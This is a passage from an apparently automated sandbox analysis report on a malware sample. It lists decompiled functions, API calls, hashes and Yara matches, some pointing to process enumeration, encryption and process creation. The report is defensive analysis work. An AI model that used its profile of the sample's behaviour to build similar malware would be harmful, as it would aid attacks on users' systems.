                                                                              • GetKeyState.USER32(00000011), ref: 0042682C
                                                                              • GetKeyState.USER32(00000012), ref: 00426835
                                                                              • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0042684B
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: State$LongMessageSendWindow
                                                                              • String ID:
                                                                              • API String ID: 1063413437-0
                                                                              • Opcode ID: c749473ecdc197767b1aada0aac7563496d0904765f4c70556c9bccb0dd829c8
                                                                              • Instruction ID: de9f64a4c44467bbe143d1cc0095200852411478b543e347cc288a0361768c2f
                                                                              • Opcode Fuzzy Hash: c749473ecdc197767b1aada0aac7563496d0904765f4c70556c9bccb0dd829c8
                                                                              • Instruction Fuzzy Hash: 6DF0E932B4136B26E92036757E41FA951154F50BD4F93053EB741EA1E1C999C842517C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02221943, Relevance: 6.0, APIs: 4, Instructions: 37processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02221954
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 02221973
                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 02221983
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0222199F
                                                                                • Part of subcall function 02222255: GetCurrentProcessId.KERNEL32(?,00000000,?,?,0222199A,0000022C), ref: 02222273
                                                                                • Part of subcall function 02222255: GetCurrentProcessId.KERNEL32(?,00000000,?,?,0222199A,0000022C), ref: 02222284
                                                                                • Part of subcall function 02222255: lstrcpyW.KERNEL32(00000004,?), ref: 022222B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CurrentProcessProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                              • String ID:
                                                                              • API String ID: 210870473-0
                                                                              • Opcode ID: 1322de537e9621b1676d88800f2e0aa59157f821c68909524a6d342622f5f428
                                                                              • Instruction ID: f889ca64319e41132d6ba2a2be36f4e9d761fc46f4a0a9adb044405628a0a9da
                                                                              • Opcode Fuzzy Hash: 1322de537e9621b1676d88800f2e0aa59157f821c68909524a6d342622f5f428
                                                                              • Instruction Fuzzy Hash: 6CF09631901138BBD73066F5BC0CFEE766CDF49610F104591FC0DE2085D77589398AA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222207B, Relevance: 4.6, APIs: 3, Instructions: 85encryptionCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CryptDuplicateHash.ADVAPI32(00000000,00000000,?), ref: 022220CC
                                                                              • CryptEncrypt.ADVAPI32(?,00000001,00000000,?,?,?), ref: 022220FD
                                                                              • CryptDestroyHash.ADVAPI32(?), ref: 02222139
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Crypt$Hash$DestroyDuplicateEncrypt
                                                                              • String ID:
                                                                              • API String ID: 1128268866-0
                                                                              • Opcode ID: 2d8261ac3592e581bcfd97cb8ddc46efdc6cfcc726400b24302b3dbb1de9ba0b
                                                                              • Instruction ID: 0ab340c61e6088188f5a4f2b84acbcfe641a56ed2177af62297df24dcc9c1a6a
                                                                              • Opcode Fuzzy Hash: 2d8261ac3592e581bcfd97cb8ddc46efdc6cfcc726400b24302b3dbb1de9ba0b
                                                                              • Instruction Fuzzy Hash: 03216471A10226FFDB10DFA4EC44EAAB7B9EF04350B104655ED19CB265DB32DA64CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02221F11, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33encryptionCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CryptExportKey.ADVAPI32(?,?,00000001,00000040,?,?), ref: 02221F2F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CryptExport
                                                                              • String ID: l
                                                                              • API String ID: 3389274496-2517025534
                                                                              • Opcode ID: cb03ad6205b545fc324c588979bc03d7024debcc891c62fa028fcb391267f12b
                                                                              • Instruction ID: 3f931f4ce67c5f971f7c8af09391dde8508ab140ebb4ee828478c661faab5a2a
                                                                              • Opcode Fuzzy Hash: cb03ad6205b545fc324c588979bc03d7024debcc891c62fa028fcb391267f12b
                                                                              • Instruction Fuzzy Hash: F4F02730A0022CAADB10DAA4C845EFEBBBDDB00A04F10019AED09E7141E6719A1887E4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02221D2B, Relevance: 3.1, APIs: 2, Instructions: 68processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,?,00000000,?,?), ref: 02221D8A
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000400,?,00000000,?,?), ref: 02221DBA
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateProcess$User
                                                                              • String ID:
                                                                              • API String ID: 4042571897-0
                                                                              • Opcode ID: 71116b9d731ffe1246e6bf93018be4eaffef3c7fa5618771b82b549d6956c2d2
                                                                              • Instruction ID: d1659de7494b16415348dd20ac6c28c65f595221c8d05f8c67d200827961a818
                                                                              • Opcode Fuzzy Hash: 71116b9d731ffe1246e6bf93018be4eaffef3c7fa5618771b82b549d6956c2d2
                                                                              • Instruction Fuzzy Hash: 43116D71A11228BBCB219ED69C48DDFBFBDEF85660F144056F608A3244D6714E22CBE0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02221F56, Relevance: 1.5, APIs: 1, Instructions: 14encryptionCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 02221F6B
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CryptHashParam
                                                                              • String ID:
                                                                              • API String ID: 1839025277-0
                                                                              • Opcode ID: 6ffdea7f0dc1d212b1e4af10232beb9087bbfba103a969d5e292797684bb6bda
                                                                              • Instruction ID: 346d57b7a4c05a58c557b57a2e4f9f972ba99615acc1bb4e2f650d2c0312500d
                                                                              • Opcode Fuzzy Hash: 6ffdea7f0dc1d212b1e4af10232beb9087bbfba103a969d5e292797684bb6bda
                                                                              • Instruction Fuzzy Hash: DAC012B455020CBFE610CB81DC0AFBAB76CD745704F404589BD0452281DAB15E1056B1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222AC8A, Relevance: 42.3, APIs: 1, Strings: 23, Instructions: 321libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(00000000), ref: 0222B7E0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: |?O$1N$R;+$+`Ne$+g2$/2x$0C$3g/$<3)R$JN:U$Lu{$V'#<$YVgE$^U8s$`O$$dc$l{k'$m7Yi$rhP$}6`s$KE&$[b>$x)!
                                                                              • API String ID: 1029625771-3710415127
                                                                              • Opcode ID: e75084b92bad4394486dbba2acddb91edbb6834273ca27283cc1c4f699377640
                                                                              • Instruction ID: 74648a6f30a11cc4709f05e262d43c727b4240560b544d2f1e2bca06f1d06ec6
                                                                              • Opcode Fuzzy Hash: e75084b92bad4394486dbba2acddb91edbb6834273ca27283cc1c4f699377640
                                                                              • Instruction Fuzzy Hash: 7642B5F48563ADCBDB619F829A897CDBB34BB41304F6096C9C25C3A214DB740B85CF89
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042E657, Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registrywindowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042E657(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterWindowMessageA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterWindowMessageA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterWindowMessageA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterWindowMessageA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterWindowMessageA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterWindowMessageA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterWindowMessageA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterWindowMessageA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterWindowMessageA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterWindowMessageA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterWindowMessageA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterWindowMessageA("RichEdit Text and Objects");
				return _t27;
			}




                                                                              0x0042e664
                                                                              0x0042e66d
                                                                              0x0042e676
                                                                              0x0042e680
                                                                              0x0042e68a
                                                                              0x0042e694
                                                                              0x0042e69e
                                                                              0x0042e6a8
                                                                              0x0042e6b2
                                                                              0x0042e6bc
                                                                              0x0042e6c6
                                                                              0x0042e6d0
                                                                              0x0042e6d5
                                                                              0x0042e6dc

                                                                              APIs
                                                                              • RegisterWindowMessageA.USER32(Native), ref: 0042E666
                                                                              • RegisterWindowMessageA.USER32(OwnerLink), ref: 0042E66F
                                                                              • RegisterWindowMessageA.USER32(ObjectLink), ref: 0042E679
                                                                              • RegisterWindowMessageA.USER32(Embedded Object), ref: 0042E683
                                                                              • RegisterWindowMessageA.USER32(Embed Source), ref: 0042E68D
                                                                              • RegisterWindowMessageA.USER32(Link Source), ref: 0042E697
                                                                              • RegisterWindowMessageA.USER32(Object Descriptor), ref: 0042E6A1
                                                                              • RegisterWindowMessageA.USER32(Link Source Descriptor), ref: 0042E6AB
                                                                              • RegisterWindowMessageA.USER32(FileName), ref: 0042E6B5
                                                                              • RegisterWindowMessageA.USER32(FileNameW), ref: 0042E6BF
                                                                              • RegisterWindowMessageA.USER32(Rich Text Format), ref: 0042E6C9
                                                                              • RegisterWindowMessageA.USER32(RichEdit Text and Objects), ref: 0042E6D3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: MessageRegisterWindow
                                                                              • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                              • API String ID: 1814269913-2889995556
                                                                              • Opcode ID: f94b3afc578d778d6bf50c54cce4d5399f28073c0875a693aa6b0923429169c7
                                                                              • Instruction ID: 3148e3fe882cb6921084bbb575d8ac1fe485f6c47ad919569a1cc5a96f9e35c4
                                                                              • Opcode Fuzzy Hash: f94b3afc578d778d6bf50c54cce4d5399f28073c0875a693aa6b0923429169c7
                                                                              • Instruction Fuzzy Hash: 98014C70A407485AEB30AF769C09D0BBAE4EED5B103624D2FD09597652D7BCD004CFD8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042C343, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 167registrylibraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E0042C343(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				void* _v28;
				void* _v32;
				int _v36;
				int _v40;
				signed short _v44;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				intOrPtr _t42;
				struct HINSTANCE__* _t43;
				_Unknown_base(*)()* _t44;
				struct HINSTANCE__* _t46;
				signed int _t50;
				signed short _t65;
				signed int _t66;
				int _t70;
				signed short _t71;
				signed int _t72;
				signed short _t78;
				signed int _t79;
				char* _t85;
				int _t87;
				signed int _t98;
				signed int _t103;
				int _t104;
				int _t105;
				void* _t109;
				void* _t113;

				_t42 =  *0x457184; // 0xc72e1596
				_t85 = 0;
				_v8 = _t42;
				_v28 = 0;
				_t43 = GetModuleHandleA("kernel32.dll");
				_v36 = _t43;
				_t44 = GetProcAddress(_t43, "GetUserDefaultUILanguage");
				if(_t44 == 0) {
					if(GetVersion() >= 0) {
						_t46 = GetModuleHandleA("ntdll.dll");
						if(_t46 == 0) {
							L13:
							 *((intOrPtr*)(_t113 + 0xffffffffffffffc4)) = 0x800;
							_t109 = 1;
							_t103 = 0;
							if(1 <= _t85) {
								L16:
								L17:
								return E00412FBB(0, _v8);
							}
							while(E0042C2AE(_t109, _a4,  *((intOrPtr*)(_t113 + _t103 * 4 - 0x3c))) == _t85) {
								_t103 =  &(1[_t103]);
								if(_t103 < _t109) {
									continue;
								}
								goto L16;
							}
							goto L17;
						}
						_v28 = 0;
						EnumResourceLanguagesA(_t46, 0x10, 1, E0042C32D,  &_v28);
						if(_v28 == 0) {
							goto L13;
						}
						_t50 = _v28 & 0x0000ffff;
						_t104 = _t50 & 0x3ff;
						_v64 = ConvertDefaultLocale(_t50 & 0x0000fc00 | _t104);
						_v60 = ConvertDefaultLocale(_t104);
						_push(2);
						L12:
						_pop(0);
						goto L13;
					}
					_v32 = 0;
					if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v32) == 0) {
						_v36 = 0x10;
						if(RegQueryValueExA(_v32, 0, 0,  &_v40,  &_v24,  &_v36) == 0 && _v40 == 1 && E00412FC9( &_v24, "%x",  &_v44) == 1) {
							_t65 = _v44;
							_v28 = _t65;
							_t66 = _t65 & 0x0000ffff;
							_t105 = _t66 & 0x3ff;
							_v64 = ConvertDefaultLocale(_t66 & 0x0000fc00 | _t105);
							_t70 = ConvertDefaultLocale(_t105);
							_push(2);
							_v60 = _t70;
							_pop(0);
						}
						RegCloseKey(_v32);
					}
					goto L13;
				}
				_t71 =  *_t44();
				_v28 = _t71;
				_t72 = _t71 & 0x0000ffff;
				_t98 = _t72 & 0x3ff;
				_v32 = _t98;
				_v64 = ConvertDefaultLocale(_t72 & 0x0000fc00 | _t98);
				_v60 = ConvertDefaultLocale(_v32);
				_t78 =  *(GetProcAddress(_v36, "GetSystemDefaultUILanguage"))();
				_v28 = _t78;
				_t79 = _t78 & 0x0000ffff;
				_t87 = _t79 & 0x3ff;
				_v56 = ConvertDefaultLocale(_t79 & 0x0000fc00 | _t87);
				_v52 = ConvertDefaultLocale(_t87);
				_push(4);
				_t85 = 0;
				goto L12;
			}


































                                                                              0x0042c349
                                                                              0x0042c357
                                                                              0x0042c35e
                                                                              0x0042c361
                                                                              0x0042c366
                                                                              0x0042c36e
                                                                              0x0042c371
                                                                              0x0042c379
                                                                              0x0042c3ed
                                                                              0x0042c49a
                                                                              0x0042c49e
                                                                              0x0042c4e8
                                                                              0x0042c4e8
                                                                              0x0042c4f0
                                                                              0x0042c4f1
                                                                              0x0042c4f5
                                                                              0x0042c50e
                                                                              0x0042c510
                                                                              0x0042c51c
                                                                              0x0042c51c
                                                                              0x0042c4f7
                                                                              0x0042c509
                                                                              0x0042c50c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042c50c
                                                                              0x00000000
                                                                              0x0042c4f7
                                                                              0x0042c4ae
                                                                              0x0042c4b1
                                                                              0x0042c4bb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042c4bd
                                                                              0x0042c4cf
                                                                              0x0042c4dd
                                                                              0x0042c4e2
                                                                              0x0042c4e5
                                                                              0x0042c4e7
                                                                              0x0042c4e7
                                                                              0x00000000
                                                                              0x0042c4e7
                                                                              0x0042c407
                                                                              0x0042c412
                                                                              0x0042c429
                                                                              0x0042c438
                                                                              0x0042c45a
                                                                              0x0042c463
                                                                              0x0042c466
                                                                              0x0042c471
                                                                              0x0042c47f
                                                                              0x0042c482
                                                                              0x0042c484
                                                                              0x0042c486
                                                                              0x0042c489
                                                                              0x0042c489
                                                                              0x0042c48d
                                                                              0x0042c48d
                                                                              0x00000000
                                                                              0x0042c412
                                                                              0x0042c37b
                                                                              0x0042c38d
                                                                              0x0042c390
                                                                              0x0042c397
                                                                              0x0042c39f
                                                                              0x0042c3a7
                                                                              0x0042c3b4
                                                                              0x0042c3bd
                                                                              0x0042c3bf
                                                                              0x0042c3c2
                                                                              0x0042c3c9
                                                                              0x0042c3d4
                                                                              0x0042c3d9
                                                                              0x0042c3dc
                                                                              0x0042c3de
                                                                              0x00000000

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0042C366
                                                                              • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0042C371
                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 0042C3A2
                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 0042C3AA
                                                                              • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0042C3B7
                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 0042C3D1
                                                                              • ConvertDefaultLocale.KERNEL32(000003FF), ref: 0042C3D7
                                                                              • GetVersion.KERNEL32 ref: 0042C3E5
                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 0042C40A
                                                                              • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0042C430
                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 0042C47C
                                                                              • ConvertDefaultLocale.KERNEL32(74B04DE0), ref: 0042C482
                                                                              • RegCloseKey.ADVAPI32(?), ref: 0042C48D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                                                              • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                              • API String ID: 780041395-483790700
                                                                              • Opcode ID: e7ab873c4a7da65feff9fc701e108c43e95153f360078c6021a868a4be157191
                                                                              • Instruction ID: ccf25d3531818ff2d7a54f46dd2cf71900e61049d2b2bcb3935074943bb9269f
                                                                              • Opcode Fuzzy Hash: e7ab873c4a7da65feff9fc701e108c43e95153f360078c6021a868a4be157191
                                                                              • Instruction Fuzzy Hash: D4517871E40229AFDF109FE5DD86ABFBAB8EB48314F50443BE501E3150D6BC9941DB64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004274DA, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 167stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 98%
                                                                              			E004274DA(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
				intOrPtr _v8;
				char _v16;
				char _v17;
				char _v272;
				struct _WNDCLASSEXA _v320;
				void* __ebp;
				intOrPtr _t52;
				signed int _t56;
				char _t58;
				long _t60;
				int _t71;
				long _t81;
				CHAR* _t83;
				void* _t90;
				void* _t99;
				long* _t102;
				signed int _t104;
				long _t105;
				CHAR* _t107;
				int _t108;

				_t52 =  *0x457184; // 0xc72e1596
				_push(E0042CC8D);
				_v8 = _t52;
				_t90 = E0042E088(0x458600);
				if(_a4 == 3) {
					_t104 =  *(_t90 + 0x14);
					_t99 =  *_a12;
					_t56 =  *(E0042D179() + 0x14) & 0x000000ff;
					_a4 = _t56;
					if(_t104 != 0 || ( *(_t99 + 0x23) & 0x00000040) == 0 && _t56 == 0) {
						if( *0x45a368 == 0) {
							L10:
							if(_t104 == 0) {
								if( *0x459f80 != 0) {
									L16:
									if(GetClassLongA(_a8, 0xffffffe0) !=  *0x459f80) {
										L20:
										_t58 = GetWindowLongA(_a8, 0xfffffffc);
										_v16 = _t58;
										if(_t58 != 0) {
											_t107 = "AfxOldWndProc423";
											if(GetPropA(_a8, _t107) == 0) {
												SetPropA(_a8, _t107, _v16);
												if(GetPropA(_a8, _t107) == _v16) {
													GlobalAddAtomA(_t107);
													SetWindowLongA(_a8, 0xfffffffc, E00427382);
												}
											}
										}
										goto L24;
									}
									goto L24;
								}
								_t108 = 0x30;
								E00412140( &_v320, 0, _t108);
								_v320.cbSize = _t108;
								_t71 = GetClassInfoExA(0, "#32768",  &_v320);
								 *0x459f80 = _t71;
								if(_t71 == 0) {
									if(GetClassNameA(_a8,  &_v272, 0x100) == 0) {
										goto L20;
									}
									_v17 = 0;
									if(E004132A8( &_v272, "#32768") == 0) {
										goto L24;
									}
									goto L20;
								}
								goto L16;
							}
							E00426447(_t104, _a8);
							 *((intOrPtr*)( *_t104 + 0x50))();
							_t102 =  *((intOrPtr*)( *_t104 + 0xf0))();
							_t81 = SetWindowLongA(_a8, 0xfffffffc, E00426AB8);
							if(_t81 != E00426AB8) {
								 *_t102 = _t81;
							}
							 *(_t90 + 0x14) =  *(_t90 + 0x14) & 0x00000000;
							goto L24;
						}
						if((GetClassLongA(_a8, 0xffffffe6) & 0x00010000) != 0) {
							goto L24;
						}
						_t83 =  *(_t99 + 0x28);
						if(_t83 <= 0xffff) {
							_v16 = 0;
							GlobalGetAtomNameA(0,  &_v16, 5);
							_t83 =  &_v16;
						}
						if(lstrcmpiA(_t83, "ime") == 0) {
							goto L24;
						}
						goto L10;
					} else {
						L24:
						_t105 = CallNextHookEx( *(_t90 + 0x28), 3, _a8, _a12);
						if(_a4 != 0) {
							UnhookWindowsHookEx( *(_t90 + 0x28));
							 *(_t90 + 0x28) =  *(_t90 + 0x28) & 0x00000000;
						}
						_t60 = _t105;
						goto L27;
					}
				} else {
					_t60 = CallNextHookEx( *(_t90 + 0x28), _a4, _a8, _a12);
					L27:
					return E00412FBB(_t60, _v8);
				}
			}























                                                                              0x004274e3
                                                                              0x004274e9
                                                                              0x004274f3
                                                                              0x004274ff
                                                                              0x00427501
                                                                              0x0042751e
                                                                              0x00427522
                                                                              0x0042752b
                                                                              0x0042752f
                                                                              0x00427532
                                                                              0x0042754d
                                                                              0x0042759d
                                                                              0x0042759f
                                                                              0x004275e6
                                                                              0x00427623
                                                                              0x00427635
                                                                              0x0042766c
                                                                              0x00427671
                                                                              0x00427679
                                                                              0x0042767c
                                                                              0x00427684
                                                                              0x00427691
                                                                              0x0042769a
                                                                              0x004276a9
                                                                              0x004276ac
                                                                              0x004276bc
                                                                              0x004276bc
                                                                              0x004276a9
                                                                              0x00427691
                                                                              0x00000000
                                                                              0x0042767c
                                                                              0x00000000
                                                                              0x00427637
                                                                              0x004275ea
                                                                              0x004275f5
                                                                              0x00427603
                                                                              0x00427612
                                                                              0x0042761b
                                                                              0x00427621
                                                                              0x00427653
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042765d
                                                                              0x0042766a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042766a
                                                                              0x00000000
                                                                              0x00427621
                                                                              0x004275a6
                                                                              0x004275af
                                                                              0x004275c7
                                                                              0x004275c9
                                                                              0x004275d1
                                                                              0x004275d3
                                                                              0x004275d3
                                                                              0x004275d5
                                                                              0x00000000
                                                                              0x004275d5
                                                                              0x0042755f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427565
                                                                              0x0042756d
                                                                              0x0042757b
                                                                              0x00427580
                                                                              0x00427586
                                                                              0x00427586
                                                                              0x00427597
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004276c2
                                                                              0x004276c2
                                                                              0x004276d7
                                                                              0x004276d9
                                                                              0x004276de
                                                                              0x004276e4
                                                                              0x004276e4
                                                                              0x004276e9
                                                                              0x00000000
                                                                              0x004276eb
                                                                              0x00427503
                                                                              0x0042750f
                                                                              0x004276ec
                                                                              0x004276f6
                                                                              0x004276f6

                                                                              APIs
                                                                                • Part of subcall function 0042E088: __EH_prolog.LIBCMT ref: 0042E08D
                                                                              • CallNextHookEx.USER32(?,00000003,?,?), ref: 0042750F
                                                                              • GetClassLongA.USER32 ref: 00427554
                                                                              • GlobalGetAtomNameA.KERNEL32 ref: 00427580
                                                                              • lstrcmpiA.KERNEL32(?,ime,?,?,Function_0002CC8D), ref: 0042758F
                                                                              • SetWindowLongA.USER32 ref: 004275C9
                                                                              • CallNextHookEx.USER32(?,00000003,?,?), ref: 004276CD
                                                                              • UnhookWindowsHookEx.USER32(?), ref: 004276DE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
                                                                              • String ID: #32768$AfxOldWndProc423$ime
                                                                              • API String ID: 3204395069-4034971020
                                                                              • Opcode ID: f1106e329e0d48cfa7b4281d793f4c3b4a21ab62a295908a11e446d5d3b41d10
                                                                              • Instruction ID: 6d6a61d64b0a46c21682db064ec92116b6d0e966afff3592de9503a681794b40
                                                                              • Opcode Fuzzy Hash: f1106e329e0d48cfa7b4281d793f4c3b4a21ab62a295908a11e446d5d3b41d10
                                                                              • Instruction Fuzzy Hash: 96518C31604225BBCF119F64EC48B9A7BB5EF04765F548166FC18E62A1C778CE50CB9C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004090D5, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E004090D5() {
				intOrPtr _t5;
				_Unknown_base(*)()* _t6;
